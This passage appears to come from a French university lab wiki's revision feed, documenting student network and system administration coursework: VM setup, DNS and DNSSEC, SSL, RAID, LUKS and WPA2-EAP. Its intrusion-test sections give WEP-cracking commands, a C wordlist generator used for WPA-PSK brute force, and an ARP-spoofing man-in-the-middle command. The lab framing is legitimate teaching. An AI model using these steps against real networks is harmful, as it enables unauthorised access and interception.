 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;br /&gt;
&lt;br /&gt;
== Ferme de serveur ==&lt;br /&gt;
&lt;br /&gt;
Ajout du bridge bridgeStudents sur la VM (fichier .cfg)&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54785</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54785"/>
				<updated>2020-12-17T08:13:35Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Site Web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
